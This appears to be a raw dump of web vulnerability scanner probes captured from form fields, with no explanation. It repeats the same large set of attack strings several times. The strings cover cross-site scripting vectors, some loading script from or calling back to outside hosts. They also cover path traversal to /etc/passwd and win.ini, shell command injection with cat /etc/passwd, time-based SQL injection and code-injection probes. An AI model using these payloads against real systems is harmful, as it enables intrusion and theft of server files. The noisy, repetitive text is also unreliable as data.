http://www.acunetix.tst

1

1

1<img/src=">" onerror=alert(988598)>

-1))

1

WEB-INF/web.xml

"|dir

1'"()&%<ScRiPt >prompt(988482)</ScRiPt>

1

'"

1<ScRiPt%20>prompt(979374)</sCripT>

1

ImUZmVLt'

<!--

'"()&%<ScRiPt >prompt(905668)</ScRiPt>

WEB-INF\web.xml

2YW2AJmt')

1

1&lt

1

1

1

jHib75kA'))

1

1_975874

1

\xf6<img acu onmouseover=prompt(951454) //\xf6>

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1<input autofocus onfocus=prompt(938329)>

../../../../../../../../../../boot.ini

1

1

response.write(9021377*9893922)

<a href='http://www.acunetix.com'>website security</a>

'+response.write(9021377*9893922)+'

../../../../../../../../../../windows/win.ini.jpg

"+response.write(9021377*9893922)+"

1

[url=http://www.acunetix.com]website security[/url]

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1_L4jhv <ScRiPt >prompt(964909)</ScRiPt>

1

1

1

1

................windowswin.ini

1

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

cat /etc/passwd

1

1

1

1

${99568+100272}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1&n955484=v968445

1some_inexistent_file_with_long_name%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

|cat /etc/passwd#

WEB-INF/web.xml

testasp.vulnweb.com

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

1

WEB-INF\web.xml

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1

)

1

1

!(()&&!|*|*|

1

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

^(#$!@#$)(()))******

1

1

'"()

1

acu6470\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6470

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

1

acux6083\xc0\xbez1\xc0\xbcz2a\x90bcxuca6083

1

/etc/passwd

1

1

1

"

1<ScRiPt >prompt(950576)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

'

1

||cat /etc/passwd

1<script>prompt(927892)</script>

"

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1<ScRiPt >prompt(995786)</ScRiPt>

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

acunetix_wvs_invalid_filename

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956545></ScRiPt>

1

http://hitPAsRpsSQ8T.bxss.me/

1

1

'&dir&'

comments

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

comments

1<ScRiPt >prompt(931603)</ScRiPt>

1

1

"&dir&"

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments/.

1<video><source onerror="javascript:prompt(926170)">

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

1

|dir

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918378)"></g></svg>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

http://www.acunetix.tst

1

1

-1

'|dir

1

1

file:///etc/passwd

1<div style=width:expression(prompt(943449))>

'"

1

1

-1)

"|dir

<!--

1

1

1<iframe src='data:text/html

1

/\../\../\../\../\../\../\../etc/passwd

1

-1))

1

1

1

1

1<body onload=prompt(958231)>

7W7KLGJj'

1

1

WEB-INF/web.xml

1

1

mdrXxHTt')

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(907582)>

1'"()&%<ScRiPt >prompt(950957)</ScRiPt>

response.write(9932328*9412706)

&cat /etc/passwd&

WEB-INF\web.xml

1

1

w8XHRlN5'))

1<img src=xyz OnErRor=prompt(905187)>

'+response.write(9932328*9412706)+'

'"()&%<ScRiPt >prompt(940585)</ScRiPt>

1

1

1

1<img/src=">" onerror=alert(985224)>

-1

../../../../../../../../../../windows/win.ini

'&cat /etc/passwd&'

"+response.write(9932328*9412706)+"

1

1

1<ScRiPt%20>prompt(934211)</sCripT>

1_949900

SomeCustomInjectedHeader:injected_by_wvs

-1)

"&cat /etc/passwd&"

../../../../../../../../../../boot.ini

1

1&lt

1

1

-1))

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

\xf6<img acu onmouseover=prompt(932127) //\xf6>

../../../../../../../../../../windows/win.ini.jpg

r5JMwZSQ'

`cat /etc/passwd`

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

WmcHx9yS')

1<input autofocus onfocus=prompt(986326)>

|cat /etc/passwd#

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

../../../../../../../../../../etc/passwd

1

mNWuBcim'))

<a href='http://www.acunetix.com'>website security</a>

1

1

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

................windowswin.ini

1

[url=http://www.acunetix.com]website security[/url]

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1_FQt6I <ScRiPt >prompt(971419)</ScRiPt>

acu5681\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5681

"|"ld

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

acux9327\xc0\xbez1\xc0\xbcz2a\x90bcxuca9327

1

1

1

-1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(986766)</ScRiPt>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${99673+99360}

1

-1)

1<script>prompt(973918)</script>

'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt >prompt(954778)</ScRiPt>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

"

1

SUIv47Ya'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1&n952368=v948704

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?938140></ScRiPt>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1

kxn57wBJ')

1<ScRiPt >prompt(909455)</ScRiPt>

||cat /etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

jRdiqlD6'))

1

testasp.vulnweb.com

1<video><source onerror="javascript:prompt(914355)">

1

&dir

-1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951387)"></g></svg>

)

WEB-INF/web.xml

1

-1)

1

/etc/passwd

1<div style=width:expression(prompt(962680))>

!(()&&!|*|*|

1

1

'&dir&'

-1))

1<iframe src='data:text/html

^(#$!@#$)(()))******

WEB-INF\web.xml

1

"&dir&"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

PK7QVfxm'

1

1<body onload=prompt(967072)>

1

1

cNvKFpQG')

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965412)>

1

1

1

1

1

WUTQo9Cq'))

1

|dir

1<img src=xyz OnErRor=prompt(921462)>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

1

1<img/src=">" onerror=alert(944507)>

1

'"()

'|dir

1

1

1

1

1

1<ScRiPt%20>prompt(923836)</sCripT>

'

"|dir

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1&lt

1

1

1

file:///etc/passwd

"

\xf6<img acu onmouseover=prompt(925089) //\xf6>

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

http://hitPrGyFrQk9v.bxss.me/

acunetix_wvs_invalid_filename

1

1

/\../\../\../\../\../\../\../etc/passwd

1<input autofocus onfocus=prompt(993513)>

${@print(md5(acunetix_wvs_security_test))}\

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

comments

WEB-INF/web.xml

[url=http://www.acunetix.com]website security[/url]

1

http://www.acunetix.tst

'"

comments/.

1

1

1_9KJmc <ScRiPt >prompt(977138)</ScRiPt>

1

<!--

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(952983)</ScRiPt>

1

1

1

1

1

'"()&%<ScRiPt >prompt(979646)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1_956507

response.write(9459033*9685433)

1

../../../../../../../../../../boot.ini

&cat /etc/passwd&

1

1

1

'+response.write(9459033*9685433)+'

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

'&cat /etc/passwd&'

"+response.write(9459033*9685433)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

................windowswin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

${99135+99316}

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n950606=v981985

1

../../../../../../../../../../etc/passwd.jpg

'|'ld

)

1

1some_inexistent_file_with_long_name%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

1

1

^(#$!@#$)(()))******

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

testasp.vulnweb.com

1

1

acu4925\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4925

1

1

WEB-INF/web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1

acux2693\xc0\xbez1\xc0\xbcz2a\x90bcxuca2693

'

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

WEB-INF\web.xml

1

1<ScRiPt >prompt(967484)</ScRiPt>

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<script>prompt(906670)</script>

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<ScRiPt >prompt(991261)</ScRiPt>

'

1

1

1

1

||cat /etc/passwd

-1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900425></ScRiPt>

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

http://hitR6fEG6o5X9.bxss.me/

1<ScRiPt >prompt(950296)</ScRiPt>

acunetix_wvs_invalid_filename

&dir

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

comments

1<video><source onerror="javascript:prompt(943398)">

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

oJoDOwRZ'

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(938806)"></g></svg>

1

1

kS4QCFyq')

1

1<div style=width:expression(prompt(948314))>

comments/.

1

'&dir&'

1

1<iframe src='data:text/html

file:///etc/passwd

7PJs7j7W'))

http://www.acunetix.tst

1

1

1

1

"&dir&"

-1

1<body onload=prompt(980098)>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988146)>

-1)

1

1'"()&%<ScRiPt >prompt(967849)</ScRiPt>

1

|dir

'"

-1))

WEB-INF/web.xml

1<img src=xyz OnErRor=prompt(935108)>

1

1

<!--

1

'"()&%<ScRiPt >prompt(957127)</ScRiPt>

1

1

1<img/src=">" onerror=alert(922422)>

gSw7JPQe'

'|dir

1

1<ScRiPt%20>prompt(917073)</sCripT>

1

WEB-INF\web.xml

3JHniz0q')

1_969462

"|dir

1

1

1&lt

XqjdVbXI'))

../../../../../../../../../../windows/win.ini

1

1

1

1

\xf6<img acu onmouseover=prompt(911478) //\xf6>

../../../../../../../../../../boot.ini

1<input autofocus onfocus=prompt(926826)>

1

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../windows/win.ini.jpg

[url=http://www.acunetix.com]website security[/url]

1

1_e4GJv <ScRiPt >prompt(945816)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

1

1

1

1

1

acu2507\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2507

1

acux5142\xc0\xbez1\xc0\xbcz2a\x90bcxuca5142

1

1

1<ScRiPt >prompt(971248)</ScRiPt>

1

1

1<script>prompt(950004)</script>

1

1

1<ScRiPt >prompt(978474)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968596></ScRiPt>

1

1

1<ScRiPt >prompt(940841)</ScRiPt>

1

1<video><source onerror="javascript:prompt(953286)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974653)"></g></svg>

1<div style=width:expression(prompt(969088))>

1

response.write(9426113*9210663)

1

1<iframe src='data:text/html

1

'+response.write(9426113*9210663)+'

1

1

1<body onload=prompt(915552)>

1

"+response.write(9426113*9210663)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980527)>

1

1

1

1

1<img src=xyz OnErRor=prompt(975221)>

1

1

1

1<img/src=">" onerror=alert(986055)>

1

&cat /etc/passwd&

1

1<ScRiPt%20>prompt(994159)</sCripT>

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1&lt

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

\xf6<img acu onmouseover=prompt(936830) //\xf6>

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<input autofocus onfocus=prompt(994891)>

1

1

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1_zS1GH <ScRiPt >prompt(970058)</ScRiPt>

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99920+100087}

1

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1&n999148=v971016

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

testasp.vulnweb.com

!(()&&!|*|*|

/etc/passwd

^(#$!@#$)(()))******

1

1

1

1

1

1

1

1

'

1

1

'"()

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

||cat /etc/passwd

1

1

http://hitWMUwW42Cky.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

&dir

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

comments

1

1

comments/.

-1

"&dir&"

1

1

1

http://www.acunetix.tst

1

file:///etc/passwd

-1)

1

|dir

'"

-1))

1

1

1

j860n0E3'

<!--

/\../\../\../\../\../\../\../etc/passwd

qfIKSV4j')

1

'|dir

1'"()&%<ScRiPt >prompt(904051)</ScRiPt>

1

1

1

Y5AGzvwL'))

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(939659)</ScRiPt>

1

-1

1

"|dir

1_949329

1

1

-1)

WEB-INF\web.xml

-1))

CuuPMlJ6'

1

../../../../../../../../../../windows/win.ini

ZLtYoXyz')

1

WGevqeDN'))

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

1

1

1

1

1

acu9780\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9780

1

acux4745\xc0\xbez1\xc0\xbcz2a\x90bcxuca4745

1

1<ScRiPt >prompt(992689)</ScRiPt>

1<script>prompt(994643)</script>

1

1

1<ScRiPt >prompt(964706)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956196></ScRiPt>

1

1

1<ScRiPt >prompt(905912)</ScRiPt>

1

1<video><source onerror="javascript:prompt(914839)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934351)"></g></svg>

1

1<div style=width:expression(prompt(919483))>

1<iframe src='data:text/html

1

1<body onload=prompt(939526)>

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904143)>

1<img src=xyz OnErRor=prompt(981432)>

1

1<img/src=">" onerror=alert(998165)>

1

1<ScRiPt%20>prompt(904493)</sCripT>

1

1

1&lt

1

1

1

1

\xf6<img acu onmouseover=prompt(987009) //\xf6>

1

1<input autofocus onfocus=prompt(974053)>

1

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1_n5HVu <ScRiPt >prompt(967932)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9614114*9838987)

1

'+response.write(9614114*9838987)+'

1

"+response.write(9614114*9838987)+"

1

1

1

1

1

&cat /etc/passwd&

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100407+100241}

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

'|'ld

1some_inexistent_file_with_long_name%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

testasp.vulnweb.com

"|"ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n980158=v979419

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

)

1

!(()&&!|*|*|

'"()

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1

||cat /etc/passwd

1

1

/etc/passwd

'

1

1

"

&dir

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

'&dir&'

1

comments

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitSTU125lub3.bxss.me/

comments

1

"&dir&"

1

1

comments/.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

|dir

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1

1

'|dir

-1)

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"|dir

1

1

gBZuwX5L'

http://www.acunetix.tst

file:///etc/passwd

1

'"

1

uUXxFvfF')

<!--

1'"()&%<ScRiPt >prompt(971582)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

eB3n0JVL'))

1

response.write(9944853*9693223)

1

-1

'"()&%<ScRiPt >prompt(983574)</ScRiPt>

'+response.write(9944853*9693223)+'

WEB-INF/web.xml

1

1

1_964279

1

-1)

"+response.write(9944853*9693223)+"

1

-1))

1

HSfl5Nr4'

WEB-INF\web.xml

1

Fkt4Dn1K')

1

0BNwRv6Y'))

&cat /etc/passwd&

1

../../../../../../../../../../windows/win.ini

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../boot.ini

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

../../../../../../../../../../windows/win.ini.jpg

1

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd

${99132+99925}

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

................windowswin.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n940639=v919236

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd.jpg

testasp.vulnweb.com

1

'|'ld

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

"|"ld

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

!(()&&!|*|*|

'"()

'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

^(#$!@#$)(()))******

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

WEB-INF/web.xml

1

acu10582\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10582

'

"

acux7615\xc0\xbez1\xc0\xbcz2a\x90bcxuca7615

1

1

/etc/passwd

WEB-INF\web.xml

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

1<ScRiPt >prompt(957651)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}

1

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

1

1

1

1<script>prompt(934279)</script>

acunetix_wvs_invalid_filename

1

'&dir&'

comments

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1<ScRiPt >prompt(911221)</ScRiPt>

comments

"&dir&"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954215></ScRiPt>

comments/.

1

http://hityjjRsKjSP5.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<ScRiPt >prompt(909134)</ScRiPt>

|dir

1

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<video><source onerror="javascript:prompt(936492)">

1

1

-1

1

'|dir

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(902468)"></g></svg>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

